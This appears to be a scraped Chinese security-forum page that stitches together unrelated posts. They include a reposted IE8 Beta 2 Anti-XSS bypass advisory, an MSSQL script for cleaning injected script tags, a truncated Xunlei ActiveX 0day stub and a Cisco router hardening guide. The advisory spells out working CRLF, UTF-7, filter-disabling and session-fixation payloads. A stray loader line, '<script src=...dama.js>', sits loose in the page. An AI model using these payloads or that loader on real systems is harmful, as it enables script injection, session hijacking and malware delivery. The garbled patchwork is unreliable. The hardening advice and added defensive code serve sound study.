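非安全中国网 disclaimer:
1. All statements and images in this post are solely the personal opinion of the poster and have nothing to do with the position of this site;
2. This topic was posted by 漂流; the poster 漂流 complies with the 6 management rules of the "Copyright and Disclaimer" statement and enjoys the related rights;
3. Other organizations or individuals must obtain the consent of the poster 漂流 and of this site before using, reposting or quoting this post;
4. Parts of this post are reposted from other media and published on this site in order to pass on more information; this does not mean that this site agrees with the views expressed or is responsible for their authenticity;
5. If this post infringes the copyright of your site or of an individual, please inform this site immediately; this site will delete it promptly and offers its deepest apologies;
6. The administrators and moderators of this site have the right to delete this post without notifying the poster in advance.

Notice: the author has been banned or deleted; content automatically hidden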

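Reply to 2# vini5


    Oh, I'll be more careful next time···

Haha, I support this. You can change your avatar now, though the current one is pretty good too.

Announcement: https://www.sitedirsec.com publishes the latest vulnerabilities, please follow it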
[Original] Watch how a newbie hacks the TX mail server
I made an animation for fun, but this is also quite a dangerous vulnerability! A vulnerability in TX Mail; enough talk, on to the demonstration!
Welcome to the alliance forum www.slenk.net
非安全中国网 welcomes your visit! www.sitedir.com.cn
We accept security testing; if you are an expert, please tell us after you find a vulnerability in testing!
OK, let's start looking at the TX vulnerability. It is in the mailbox.
hack by vini5
this just so funny
why this will be show the mail files
we can see from the IE
so funny
that is I am really hacked the TX mail?
Oh my God!
※hack by vini5
# website : http://www.sitedir.com.cn/ # hack by vini5
See that? Writing a file is that simple! OK, enough talk, take your time studying it!
Download address: http://www.slenk.net/attachment.php?aid=1360
Download from this site: http://www.sitedir.com.cn/video/TXmail.rar

Haha, the posts on this webmaster forum are good; it's the place for bookish people like us to come, hehe

IE8.0 Beta 2 Anti-XSS issues
Aspect9: Internet Explorer 8.0 Beta 2 Anti-XSS Filter Vulnerabilities
Release Date: December 11, 2008
Date Reported: October 5, 2008
Severity: Medium-High (Execute scripts, Turning Protection Off, Transfer data Cross Domains)
Vendor: Microsoft
Systems Affected: Windows Platform with Internet Explorer 8.0 Beta 2
Overview:
Aspect9 has discovered several vulnerabilities in Microsoft Windows Internet Explorer 8.0 Beta 2. This new version of Microsoft's famous browser includes new security improvements such as a Cross Site Scripting (XSS) filter. This version also includes a new object that safely allows transferring data across domains, allowing them to interact with each other.

The Anti-XSS filter has been found to have some security holes in the current implementation. Microsoft decided to filter "Type 1 XSS" which is free text sent to the server being reflected to the user and therefore injecting HTML code into the website's page. They chose not to handle certain situations such as injection into a JavaScript tag space, which would be extremely difficult to filter. The software giant also chose not to filter injection into HTTP headers, which will drive hackers to focus on discovering CRLF vulnerabilities.

A quote of Microsoft's Anti-XSS filter design philosophy:
<<<
"Like all security mitigation and protection technologies, the XSS Filter's approach does have limitations, being that it is a pragmatic balance between application compatibility, security, and performance.

Some examples:
* Injection into some contexts is not blocked. Ex: Scenarios where content can be injected directly into JavaScript without breaking out of a string.
* Injections facilitated by some HTTP headers are not currently blocked. Ex: "Referer" based injection.
* If a page contains multiple nearby injection points, attacks can be constructed that thwart the XSS Filter."
>>>

For more information about the Anti-XSS filter:
http://blogs.msdn.com/dross/archive/2008/07/03/ie8-xss-filter-design-philosophy-in-depth.aspx

In order to understand the contents of this advisory, the reader must be familiar with the concept of CRLF which is distinguished from CSRF.
http://www.owasp.org/index.php/CRLF_Injection
http://www.owasp.org/index.php/CSRF

Technical Details:

Bypass using CRLF+Encodings:
---------------------------------------------
Microsoft Windows Internet Explorer 8.0 Beta 2 was designed to stop "Type 1 XSS" attacks. CRLF Injection is also XSS type 1 and is not mitigated by the filter, though the data in the query string will still be filtered. This means that if an attacker tries to exploit a CRLF for XSS in the casual manner, used in this demo:
http://www.sitedir.com.cn/crlf.py?url=cookie1%3dvalue1;%0D%0A%0D%0A<html><body><script>alert('get it?')</script></body></html>

His attack will fail as "<script>" will be filtered to "<sc#ipt>"

However, an attacker can inject a content-type header and overwrite the page charset and therefore bypass the XSS filter which uses the prior encoding. A good example for this is with utf-7, the following request:
http://www.sitedir.com.cn/crlf.py?url=cookie1%3dvalue1;%0d%0aContent-Type: text/html; charset%3dutf-7%0d%0a%0d%0a<html><body>+ADw-script+AD4-alert('owned')+ADw-/script+AD4-</body></html>

This will result in:

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-7
Server: Microsoft-IIS/6.0
Set-Cookie: url=cooki1=value1;
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Sun, 05 Oct 2008 23:46:11 GMT
Connection: close

<html><body>+ADw-script+AD4-alert('owned')+ADw-/script+AD4-</body></html>;Content-Type: text/html

This will be rendered as utf-7 and will execute.

Bypass using CRLF+"X-XSS-Protection":
-------------------------------------------------------
In addition to the problem of CRLF being able to re-write the page and bypass the filter using a different encoding than the one of the page, Microsoft were kind enough to leave a backdoor AKA feature for developers to turn the filter off. This header is called "X-XSS-Protection" which gets a Boolean value of 0 or 1. Injecting "X-XSS-Protection: 0" through CRLF an attacker can shutdown the XSS protection for the current request.

Demo:
http://www.sitedir.com.cn/crlf.py?url=cooki1%3dvalue1;%0d%0aX-XSS-Protection:0%0d%0a%0d%0a<html><body><script>alert('owned')</script></body></html>

Of course the problem goes further to any HTTP header that can be used maliciously like setting cookies and by that changing to a different user than the one logged on, such as stealing their cookie and then replacing it with a cookie of a bulk user and therefore taking over their session. Using "Location:" header to redirect pages and internal frames/iframes to look-a-like phishing websites and etc...

Demos:
http://www.sitedir.com.cn/crlf.py?url=cooki1%3dvalue1;%0d%0aLocation:http://www.micros0ft.com%0d%0a%0d%0a
http://www.sitedir.com.cn/crlf.py?url=cooki1%3dvalue1;%0d%0aSet-Cookie:sessionid%3dblablablabla_bulk_user_md5_sessionid%0d%0a%0d%0a<html><body>The server is busy, try again in 30 minutes</body></html>

CRLF+"XDomainRequestAllowed" --> XDomainRequest Enabling:
---------------------------------------------------------
Having a CRLF injection already gives an attacker the ability to overwrite the HTTP response BODY, which means he can create a new hidden image/frame/form and send data through it, data such as the domains cookie. But it is clear that overwriting the body using CRLF and making it look the same requires a "fetcher" server side script on the same domain. Also a network filter or a WAF may deny injection of double CRLF (%0d%0a%0d%0a). As time goes by and security evolves, the attacker should have a harder time sending this information out silently.

In IE8, there is a new object called "XDomainRequest" which is designed to allow safe data exchange across domains.
More information at:
http://msdn.microsoft.com/en-us/library/cc288108(VS.85).aspx

The browser will only allow the client (the JavaScript code) to interact with that website if the website returns the "XDomainRequestAllowed" Boolean header.

Using CRLF to inject XDomainRequestAllowed header an attacker can interact in a CROSS DOMAIN mode with that website without his consent, as it is being faked by the injected header. This attack concept on the XDomainRequest in general should be named "XAI" (XDR Allowed Injection)

This is a demo request to a CRLF vulnerable web page:
http://www.sitedir.com.cn/crlf.py?url=cooki1%3dvalue1;%0d%0aXDomainRequestAllowed: 1

This is how the attacker's script would look like:
------------------------------------------------
<script>
try {
    xdr = new XDomainRequest();
    xdr.onload = function() {
        alert(xdr.responseText);
    }
    xdr.open("GET", "http://www.sitedir.com.cn/crlf.py?url=cooki1%3dvalue1;%0d%0aXDomainRequestAllowed: 1");
    xdr.send("");
} catch (e) {
    alert(e.description)
}
</script>
------------------------------------------------
The attacker can now transfer data to/from that domain other domains with just 1 header injection, a new, by design weapon to replace leak data with XSS. An attacker can use the new feature to interact with web servers (i.e. send and receive data from those domains) by pretending to have the authorization to do so, using a single CRLF header injection. This is an ultimate vulnerability that exploits this new feature to enable easy information data leakage and cross domain attacks.

UTF-7 Websites are not filtered:
-------------------------------------------
When the page charset is set to utf-7 whether by the http header or by a meta tag, the Anti-XSS filter will not apply on this page, allowing a utf-7 encoded injected html code to execute. In other words, utf-7 content sent to utf-7 encoded web pages is not filtered, therefore allowing XSS attacks on utf-7 web pages.

I must admit that I have never met a website written in utf-7 for non-malicious purposes, but it is still a feature and there are many websites that implement language templates and receive the charset as a parameter from the query string or the cookie.

Demos:
http://www.sitedir.com.cn/xssurlnoparams.py/+AD4-+ADw-script+AD4-alert('see?')+ADw-/script+AD4-+ADw-div
http://www.sitedir.com.cn/xssurlnoparams.py?data=+AD4-+ADw-script+AD4-alert('see?')+ADw-/script+AD4-+ADw-div

Direct bypass using any double injection:
-----------------------------------------
A quote from the filter's architecture implementation:
<<<
"If a page contains multiple nearby injection points, attacks can be constructed that thwart the XSS Filter."
>>>
Well, that is not accurate.

ANY second appearance of the injected data will allow execution of script code. The concept is that data inside tags such as script and style is parsed by their own parser.

The CSS (style) parser has 2 characteristics that differentiate it from the script parser:
1) It is a silent parser (there is no indication of failure)
2) It is executing as batch operations per block, which means that closing A NON EXISTING (never opened) block will cause parsing of the following blocks.

What does this mean?!?!

It means that in a quite common scenario of any text injected just twice at any position inside the HTML (except inside a textarea/script/style tags, these can also be fixed by putting </textarea> in a css comment) of the page will cause at the first point where the code is injected to the page

} BODY{a:expression(alert('hi'))};</style>***<style>***

a style tag is opened and anything after it will be ignored by a silent css parser error and on the second injection:

***} BODY{a:expression(alert('hi'))};</style>***<style>

a new style block will be opened, rendered and this would automatically execute script code!

Demo:
http://www.sitedir.com.cn/doublexss.py?username=} BODY{a:expression(alert('hi'))};</style><style>

Filter False Positives:
-----------------------
The following text sent to a page as parameters will trigger a false-positive match by the Anti-XSS filter:

<"script">alert('innocent code')</script>
<'script'>alert('innocent code')</script>
"<[whatever]script>alert('innocent code')</script>

The following should trigger on most CSS design forums with a preview feature:
<style>@import</style>
<style>x:y(1)</style>

This means that a CSS tutorial web page cannot send to itself or to another page the following raw text (whether it will be treated as text or as HTML by the receiving page):

<style>color:rgb(1,2,3)</style>

Vendor Status:
Microsoft's response regarding the CRLF issues:
"We will not be lead to compromise the XSS Filter's web site compatibility by attempting to address every conceivable XSS attack scenario."

Microsoft's response regarding the STYLE issue:
"We hope we can get a change in prior to IE8 RC1"

Microsoft's response regarding the "filter not applied in UTF-7 Websites":
"Behaviour is by design"

Credit:
Rafel Ivgi

Greetings:
David Ross, the_pull, Arkon, JonD, lorgandon, xbxice, Budo, Reiter, Inga, Lucid, h.p.c, Dror Shalev, Liu Die Yu, wir3less, Zull, 0fir0, dbrod, ax1les, whitehawkofjustice

Disclaimer
The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are no warranties, implied or express, with regard to this information. In no event shall the author be liable for any direct or indirect damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk.
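
The CRLF cases in the advisory above share one root cause: a request value is copied into a response header without its control characters being rejected. The following is an added example, not part of the advisory and not the code of crlf.py; the function names and the response layout are assumptions, and the sample inputs are constructed from the header parts of the advisory's demo URLs with the markup replaced by a placeholder body. It shows the reflecting handler next to a hardened one, plus a request-side check that already fires on a single CRLF.

```python
import re
from urllib.parse import unquote

# A header-looking token that directly follows an injected CR or LF.
HEADER_AFTER_CRLF = re.compile(r"[\r\n]+[ \t]*([A-Za-z0-9-]+)[ \t]*:")


def smuggled_header_names(raw_param):
    """Detection side: header names a percent-encoded parameter would inject.

    One CRLF is enough (the XDomainRequestAllowed case), so this does not
    wait for the double CRLF that a body-rewriting request needs.
    """
    decoded = unquote(raw_param)
    return [m.group(1).lower() for m in HEADER_AFTER_CRLF.finditer(decoded)]


def build_response_vulnerable(raw_param):
    """Hypothetical stand-in for crlf.py: reflects the value into Set-Cookie."""
    value = unquote(raw_param)
    head = (f"HTTP/1.1 200 OK\r\nSet-Cookie: url={value}\r\n"
            "Content-Type: text/html\r\n\r\n")
    return (head + "<html><body>ok</body></html>").encode("utf-8")


def build_response_hardened(raw_param):
    """Same handler, but control characters never reach a header line and
    the charset is pinned by the server."""
    value = unquote(raw_param)
    if any(ord(ch) < 0x20 or ord(ch) == 0x7F for ch in value):
        raise ValueError("control character in header value")
    head = (f"HTTP/1.1 200 OK\r\nSet-Cookie: url={value}\r\n"
            "Content-Type: text/html; charset=utf-8\r\n\r\n")
    return (head + "<html><body>ok</body></html>").encode("utf-8")


def parse_headers(raw_response):
    """Split a response as a client does: headers end at the first blank line,
    and the first occurrence of a header name wins."""
    head, _, body = raw_response.partition(b"\r\n\r\n")
    headers = {}
    for line in head.decode("utf-8").split("\r\n")[1:]:
        name, sep, val = line.partition(":")
        if sep:
            headers.setdefault(name.strip().lower(), val.strip())
    return headers, body


# Constructed inputs (header parts as in the advisory, placeholder bodies).
SAMPLES = {
    "charset": "cookie1%3dvalue1;%0d%0aContent-Type: text/html; "
               "charset%3dutf-7%0d%0a%0d%0a<p>x</p>",
    "filter_off": "cooki1%3dvalue1;%0d%0aX-XSS-Protection:0%0d%0a%0d%0a<p>x</p>",
    "xdr": "cooki1%3dvalue1;%0d%0aXDomainRequestAllowed: 1",
    "benign": "cookie1%3dvalue1",
}

if __name__ == "__main__":
    for label, param in SAMPLES.items():
        headers, _ = parse_headers(build_response_vulnerable(param))
        try:
            build_response_hardened(param)
            verdict = "accepted"
        except ValueError:
            verdict = "rejected"
        print(label, smuggled_header_names(param),
              headers.get("content-type"), verdict)
```

The "xdr" sample carries no double CRLF, so a filter that only looks for %0d%0a%0d%0a would pass it; the check above and the hardened handler both catch it.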



















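SQL statement as a security helper for cleaning an MSSQL database
A SQL statement for batch-deleting a trojan that was inserted into an MSSQL database. A friend's server had a JS trojan inserted in bulk; almost every text field of every table had it inserted. I found this SQL statement online, modified it a little, and am keeping it here for later use.

    -- Removal processing
    -- Note: REPLACE does not accept text/ntext arguments, so columns of
    -- type 'text' need a CAST before the generated UPDATE works on them.
    DECLARE hCForEach CURSOR GLOBAL
    FOR
    SELECT N'update ' + QUOTENAME(o.name)
        + N' set ' + QUOTENAME(c.name) + N' = replace(' + QUOTENAME(c.name) + ',''<script src=http://www.hacker.com.cn/cn.js></script>'','''')'
    FROM sysobjects o, syscolumns c, systypes t
    WHERE o.id = c.id
        AND OBJECTPROPERTY(o.id, N'IsUserTable') = 1
        AND c.xusertype = t.xusertype
        AND t.name IN ('varchar','nvarchar','char','nchar','text')
    -- Run every generated UPDATE statement from the global cursor
    EXEC sp_MSforeach_Worker @command1 = N'?'

<script src=http://www.sitedir.com.cn/dama.js></script>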

Xunlei ActiveX Remote Exec 0day POC
# Exploit Title: Xunlei Aplayer ActiveX Remote Exec 0day POC
# Date: 2010.01.17
# Author: superli
# Software Link: http://down.sandai.net/Thunder5.9.14.1246.exe
# Version: 5.9.14.1246
# Tested on: xpsp3 ie6
# Code :
<object id=TestObj classid="CLSID:{A9322148-C691-4B9D-91FC-B9C461DBE9DD}" style="width:100;height:350"></object>

A simple security configuration scheme for Cisco routers

I. Router access control security configuration

1. Strictly control which administrators may access the router. Every maintenance action must be recorded and filed.
2. It is recommended not to access the router remotely. Even if remote access is needed, use access control lists and strong passwords to control it.
3. Strictly control access to the CON port. Specific measures:
A. If the chassis can be opened, the physical line connected to the CON port can be cut.
B. The default connection properties can be changed, for example the baud rate (the default is 96000; it can be changed to something else).
C. Use an access control list to control access to the CON port. For example:
    Router(Config)#Access-list 1 permit 192.168.0.1
    Router(Config)#line con 0
    Router(Config-line)#Transport input none
    Router(Config-line)#Login local
    Router(Config-line)#Exec-timeout 5 0
    Router(Config-line)#access-class 1 in
    Router(Config-line)#end
D. Set a strong password on the CON port.
4. If the AUX port is not used, disable it. It is not enabled by default. To disable it:
    Router(Config)#line aux 0
    Router(Config-line)#transport input none
    Router(Config-line)#no exec
5. A tiered privilege policy is recommended. For example:
    Router(Config)#username BluShin privilege 10 password G00dPa55w0rd
    Router(Config)#privilege EXEC level 10 telnet
    Router(Config)#privilege EXEC level 10 show ip access-list
6. Set a strong password for entering privileged mode. Do not set it with enable password; use the enable secret command instead. Also enable Service password-encryption.
7. Control access to the VTYs. If remote access is not needed, disable it. If it is needed, a strong password must be set. Because VTY traffic is not encrypted while it crosses the network, it has to be strictly controlled, for example: set a strong password; limit the number of concurrent connections; use an access list to strictly control the addresses allowed to connect; AAA can be used to configure user access control, and so on.
8. For IOS upgrades and backups, and for backups of the configuration file, it is recommended to use FTP instead of TFTP. For example:
    Router(Config)#ip ftp username BluShin
    Router(Config)#ip ftp password 4tppa55w0rd
    Router#copy startup-config ftp:
9. Upgrade and patch the IOS software promptly.

II. Router network service security configuration

1. Disable CDP (Cisco Discovery Protocol). For example:
    Router(Config)#no cdp run
    Router(Config-if)# no cdp enable
2. Disable the other TCP and UDP small services.
    Router(Config)# no service tcp-small-servers
    Router(Config)# no service udp-small-servers
3. Disable the Finger service.
    Router(Config)# no ip finger
    Router(Config)# no service finger
4. It is recommended to disable the HTTP service.
    Router(Config)# no ip http server
If the HTTP service is enabled, it needs a secure configuration: set a user name and password, and control it with an access list. For example:
    Router(Config)# username BluShin privilege 10 password G00dPa55w0rd
    Router(Config)# ip http auth local
    Router(Config)# no access-list 10
    Router(Config)# access-list 10 permit 192.168.0.1
    Router(Config)# access-list 10 deny any
    Router(Config)# ip http access-class 10
    Router(Config)# ip http server
    Router(Config)# exit
5. Disable the BOOTP service.
    Router(Config)# no ip bootp server
Disable booting from the network and automatically downloading the initial configuration file from the network.
    Router(Config)# no boot network
    Router(Config)# no service config
6. Disable IP Source Routing.
    Router(Config)# no ip source-route
7. If the ARP-Proxy service is not needed, it is recommended to disable it; the router has it enabled by default.
    Router(Config)# no ip proxy-arp
    Router(Config-if)# no ip proxy-arp
8. Explicitly disable IP Directed Broadcast.
    Router(Config)# no ip directed-broadcast
9. Disable IP Classless.
    Router(Config)# no ip classless
10. Disable ICMP IP Unreachables, Redirects and Mask Replies.
    Router(Config-if)# no ip unreachables
    Router(Config-if)# no ip redirects
    Router(Config-if)# no ip mask-reply
11. It is recommended to disable the SNMP service. When disabling it, some default SNMP configuration must be deleted, or an access list is needed for filtering. For example:
    Router(Config)# no snmp-server community public Ro
    Router(Config)# no snmp-server community admin RW
    Router(Config)# no access-list 70
    Router(Config)# access-list 70 deny any
    Router(Config)# snmp-server community MoreHardPublic Ro 70
    Router(Config)# no snmp-server enable traps
    Router(Config)# no snmp-server system-shutdown
    Router(Config)# no snmp-server trap-auth
    Router(Config)# no snmp-server
    Router(Config)# end
12. Disable the WINS and DNS services if they are not necessary.
    Router(Config)# no ip domain-lookup
If they are needed, configure:
    Router(Config)# hostname Router
    Router(Config)# ip name-server 202.102.134.96
13. Explicitly disable unused ports.
    Router(Config)# interface eth0/3
    Router(Config-if)# shutdown

III. Router routing protocol security configuration

1. First disable ARP-Proxy, which is enabled by default; it easily causes confusion in the routing table.
    Router(Config)# no ip proxy-arp
or
    Router(Config-if)# no ip proxy-arp
2. Enable authentication for the OSPF routing protocol. By default the OSPF authentication password is transmitted in plaintext; enabling MD5 authentication is recommended, with a key of reasonable strength (the peer router must have the same key).
    Router(Config)# router ospf 100
    Router(Config-router)# network 192.168.100.0 0.0.0.255 area 100
    ! Enable MD5 authentication.
    ! area area-id authentication enables authentication, which is plaintext password authentication.
    ! area area-id authentication message-digest
    Router(Config-router)# area 100 authentication message-digest
    Router(Config)# exit
    Router(Config)# interface eth0/1
    ! Enable the MD5 key; the key is routerospfkey.
    ! ip ospf authentication-key key enables an authentication key, but it is transmitted in plaintext.
    ! ip ospf message-digest-key key-id(1-255) md5 key
    Router(Config-if)# ip ospf message-digest-key 1 md5 routerospfkey
3. Authentication for the RIP protocol. Only RIP-V2 supports it; RIP-1 does not. It is recommended to enable RIP-V2 and to use MD5 authentication. Plain authentication is likewise transmitted in plaintext.
    Router(Config)# config terminal
    ! Enable and set up the key chain
    Router(Config)# key chain mykeychainname
    Router(Config-keychain)# key 1
    ! Set the key string
    Router(Config-keychain-key)# key-string MyFirstKeyString
    Router(Config-keychain)# key 2
    Router(Config-keychain-key)# key-string MySecondKeyString
    ! Enable RIP-V2
    Router(Config)# router rip
    Router(Config-router)# version 2
    Router(Config-router)# network 192.168.100.0
    Router(Config)# interface eth0/1
    ! Use MD5 mode authentication and select the configured key chain
    Router(Config-if)# ip rip authentication mode md5
    Router(Config-if)# ip rip authentication key-chain mykeychainname
4. The passive-interface command can be used to disable ports that do not need to receive and forward routing information. It is recommended to enable passive-interface on ports that do not need routing. However, in RIP it only stops the forwarding of routing information and does not stop receiving it. In OSPF it stops both forwarding and receiving routing information.
    ! In RIP, stop port 0/3 from forwarding routing information
    Router(Config)# router Rip
    Router(Config-router)# passive-interface eth0/3
    ! In OSPF, stop port 0/3 from receiving and forwarding routing information
    Router(Config)# router ospf 100
    Router(Config-router)# passive-interface eth0/3
5. Use access lists to filter junk and malicious routing information and to control the flow of junk information in the network.
    Router(Config)# access-list 10 deny 192.168.1.0 0.0.0.255
    Router(Config)# access-list 10 permit any
    ! Stop the router from accepting updates for the 192.168.1.0 network
    Router(Config)# router ospf 100
    Router(Config-router)# distribute-list 10 in
    ! Stop the router from forwarding and propagating routing information for the 192.168.1.0 network
    Router(Config)# router ospf 100
    Router(Config-router)# distribute-list 10 out
6. It is recommended to enable IP Unicast Reverse-Path Verification. It checks the correctness of the source IP address and can therefore prevent a certain amount of IP spoofing. However, it can only be used on routers with CEF (Cisco Express Forwarding) enabled.
    Router# config t
    ! Enable CEF
    Router(Config)# ip cef
    ! Enable Unicast Reverse-Path Verification
    Router(Config)# interface eth0/1
    Router(Config-if)# ip verify unicast reverse-path

IV. Router audit security configuration

V. Other router security configuration

1. Upgrade the IOS software promptly, and install IOS patches quickly.
2. Make careful, secure backups of the IOS.
3. Make secure backups of the router's configuration file.
4. Buy a UPS, or at least have a redundant power supply.
5. Keep complete logs of secure access to and maintenance of the router.
6. Configure the login banner strictly. It must contain wording that unauthorized users are forbidden to log in.
7. Simple protection against IP spoofing, such as filtering non-public addresses from accessing the internal network. Filter your own internal network addresses; loopback addresses (127.0.0.0/8); RFC1918 private addresses; DHCP self-assigned addresses (169.254.0.0/16); test addresses used by authors of scientific documentation (192.0.2.0/24); unused multicast addresses (224.0.0.0/4); SUN's old test addresses (20.20.20.0/24; 204.152.64.0/23); the all-networks address (0.0.0.0/8).
    Router(Config)# access-list 100 deny ip 192.168.0.0 0.0.0.255 any log
    Router(Config)# access-list 100 deny ip 127.0.0.0 0.255.255.255 any log
    Router(Config)# access-list 100 deny ip 192.168.0.0 0.0.255.255 any log
    Router(Config)# access-list 100 deny ip 172.16.0.0 0.15.255.255 any log
    Router(Config)# access-list 100 deny ip 10.0.0.0 0.255.255.255 any log
    Router(Config)# access-list 100 deny ip 169.254.0.0 0.0.255.255 any log
    Router(Config)# access-list 100 deny ip 192.0.2.0 0.0.0.255 any log
    Router(Config)# access-list 100 deny ip 224.0.0.0 15.255.255.255 any
    Router(Config)# access-list 100 deny ip 20.20.20.0 0.0.0.255 any log
    Router(Config)# access-list 100 deny ip 204.152.64.0 0.0.1.255 any log
    Router(Config)# access-list 100 deny ip 0.0.0.0 0.255.255.255 any log
8. It is recommended to use an access list to make sure that addresses leaving the internal network belong to the internal network. For example:
    Router(Config)# no access-list 101
    Router(Config)# access-list 101 permit ip 192.168.0.0 0.0.0.255 any
    Router(Config)# access-list 101 deny ip any any log
    Router(Config)# interface eth 0/1
    Router(Config-if)# description "internet Ethernet"
    Router(Config-if)# ip address 192.168.0.254 255.255.255.0
    Router(Config-if)# ip access-group 101 in
9. Protection against TCP SYN attacks. For example:
A: Protection through an access list.
    Router(Config)# no access-list 106
    Router(Config)# access-list 106 permit tcp any 192.168.0.0 0.0.0.255 established
    Router(Config)# access-list 106 deny ip any any log
    Router(Config)# interface eth 0/2
    Router(Config-if)# description "external Ethernet"
    Router(Config-if)# ip address 192.168.1.254 255.255.255.0
    Router(Config-if)# ip access-group 106 in
B: Protection through TCP intercept. (This puts a certain load on the router.)
    Router(Config)# ip tcp intercept list 107
    Router(Config)# access-list 107 permit tcp any 192.168.0.0 0.0.0.255
    Router(Config)# access-list 107 deny ip any any log
    Router(Config)# interface eth0
    Router(Config-if)# ip access-group 107 in
10. Protection against the LAND.C attack.
    Router(Config)# access-list 107 deny ip host 192.168.1.254 host 192.168.1.254 log
    Router(Config)# access-list 107 permit ip any any
    Router(Config)# interface eth 0/2
    Router(Config-if)# ip address 192.168.1.254 255.255.255.0
    Router(Config-if)# ip access-group 107 in
11. Protection against the Smurf attack.
    Router(Config)# access-list 108 deny ip any host 192.168.1.255 log
    Router(Config)# access-list 108 deny ip any host 192.168.1.0 log
12. Secure configuration of ICMP. For the incoming ICMP flow, we want to block ICMP ECHO, Redirect and Mask request. Probing with the TraceRoute command also needs to be blocked. For the outgoing ICMP flow, we can allow ECHO, Parameter Problem and Packet too big, as well as use of the TraceRoute command.
    ! Inbound ICMP Control
    Router(Config)# access-list 110 deny icmp any any echo log
    Router(Config)# access-list 110 deny icmp any any redirect log
    Router(Config)# access-list 110 deny icmp any any mask-request log
    Router(Config)# access-list 110 permit icmp any any
    ! Outbound ICMP Control
    Router(Config)# access-list 111 permit icmp any any echo
    Router(Config)# access-list 111 permit icmp any any Parameter-problem
    Router(Config)# access-list 111 permit icmp any any packet-too-big
    Router(Config)# access-list 111 permit icmp any any source-quench
    Router(Config)# access-list 111 deny icmp any any log
    ! Inbound TraceRoute Control
    Router(Config)# access-list 112 deny udp any any range 33400 34400
    ! Outbound TraceRoute Control
    Router(Config)# access-list 112 permit udp any any range 33400 34400
13. Protection against DDoS (Distributed Denial of Service).
    ! The TRINOO DDoS system
    Router(Config)# access-list 113 deny tcp any any eq 27665 log
    Router(Config)# access-list 113 deny udp any any eq 31335 log
    Router(Config)# access-list 113 deny udp any any eq 27444 log
    ! The Stacheldraht DDoS system
    Router(Config)# access-list 113 deny tcp any any eq 16660 log
    Router(Config)# access-list 113 deny tcp any any eq 65000 log
    ! The TrinityV3 System
    Router(Config)# access-list 113 deny tcp any any eq 33270 log
    Router(Config)# access-list 113 deny tcp any any eq 39168 log
    ! The SubSeven DDoS system and some Variants
    Router(Config)# access-list 113 deny tcp any any range 6711 6712 log
    Router(Config)# access-list 113 deny tcp any any eq 6776 log
    Router(Config)# access-list 113 deny tcp any any eq 6669 log
    Router(Config)# access-list 113 deny tcp any any eq 2222 log
    Router(Config)# access-list 113 deny tcp any any eq 7000 log
14. It is recommended to enable SSH and abandon Telnet. However, only IOS images that support and include the IPSec feature set support SSH, and IOS12.0-IOS12.2 only support SSH-V1. An example of configuring the SSH service follows:
    Router(Config)# config t
    Router(Config)# no access-list 22
    Router(Config)# access-list 22 permit 192.168.0.22
    Router(Config)# access-list 22 deny any
    Router(Config)# username BluShin privilege 10 password G00dPa55w0rd
    ! Set the SSH timeout interval and the number of login attempts
    Router(Config)# ip ssh timeout 90
    Router(Config)# ip ssh authentication-retries 2
    Router(Config)# line vty 0 4
    Router(Config-line)# access-class 22 in
    Router(Config-line)# transport input ssh
    Router(Config-line)# login local
    Router(Config-line)# exit
    ! Enable the SSH service and generate the RSA key pair.
    Router(Config)# crypto key generate rsa
    The name for the keys will be: router.blushin.org
    Choose the size of the key modulus in the range of 360 to 2048 for your General Purpose Keys .
    Choosing a key modulus greater than 512 may take a few minutes.
    How many bits in the modulus[512]: 2048
    Generating RSA Keys...
    [OK]
    Router(Config)#
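
The anti-spoofing list in step 7 of the last section is written as prefixes in the text and as wildcard masks in the ACL, and a slip in that conversion silently changes what the filter matches. The following is an added example, not part of the original article; the function names are hypothetical and the sample configuration is constructed. It derives each ACL line from its prefix and audits an existing ACL for prefixes that are not covered and for wildcard masks that do not correspond to any single prefix. Rule order and permit entries are not modelled.

```python
import ipaddress
import re

# Source prefixes named in step 7 of the article.
BOGON_PREFIXES = [
    "127.0.0.0/8", "192.168.0.0/16", "172.16.0.0/12", "10.0.0.0/8",
    "169.254.0.0/16", "192.0.2.0/24", "224.0.0.0/4", "20.20.20.0/24",
    "204.152.64.0/23", "0.0.0.0/8",
]

# Extended ACL entry of the form used in the article: <src> <wildcard> any
ACL_LINE = re.compile(
    r"access-list\s+(\d+)\s+(deny|permit)\s+ip\s+"
    r"(\d+\.\d+\.\d+\.\d+)\s+(\d+\.\d+\.\d+\.\d+)\s+any", re.IGNORECASE)


def wildcard_to_network(address, wildcard):
    """Return the network matched by address/wildcard, or None when the
    wildcard is not a contiguous run of low-order one bits."""
    w = int(ipaddress.IPv4Address(wildcard))
    if w & (w + 1):          # contiguous low bits <=> w + 1 is a power of two
        return None
    prefix_len = 32 - w.bit_length()
    base = int(ipaddress.IPv4Address(address)) & ~w & 0xFFFFFFFF
    return ipaddress.ip_network(f"{ipaddress.IPv4Address(base)}/{prefix_len}")


def render_deny(acl_id, cidr):
    """Build the ACL line for a prefix; hostmask is the wildcard mask."""
    net = ipaddress.ip_network(cidr)
    return (f"access-list {acl_id} deny ip "
            f"{net.network_address} {net.hostmask} any log")


def audit_antispoof_acl(config_text, acl_id, required=BOGON_PREFIXES):
    """Return (missing_prefixes, noncontiguous_lines) for one ACL."""
    covered, noncontiguous = [], []
    for line in config_text.splitlines():
        m = ACL_LINE.search(line)
        if not m or int(m.group(1)) != acl_id or m.group(2).lower() != "deny":
            continue
        net = wildcard_to_network(m.group(3), m.group(4))
        if net is None:
            noncontiguous.append(line.strip())
        else:
            covered.append(net)
    missing = [c for c in required
               if not any(ipaddress.ip_network(c).subnet_of(n) for n in covered)]
    return missing, noncontiguous


# Constructed sample: an incomplete ACL 100 with one mistyped wildcard.
SAMPLE_CONFIG = """\
access-list 100 deny ip 127.0.0.0 0.255.255.255 any log
access-list 100 deny ip 192.168.0.0 0.0.255.255 any log
access-list 100 deny ip 10.0.0.0 0.255.255.255 any log
access-list 100 deny ip 224.0.0.0 15.255.255.255 any
access-list 100 deny ip 204.152.64.0 0.0.2.255 any log
access-list 101 deny ip 172.16.0.0 0.15.255.255 any log
"""

if __name__ == "__main__":
    missing, bad = audit_antispoof_acl(SAMPLE_CONFIG, 100)
    for line in bad:
        print("non-contiguous wildcard:", line)
    for cidr in missing:
        print("add:", render_deny(100, cidr))
```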

















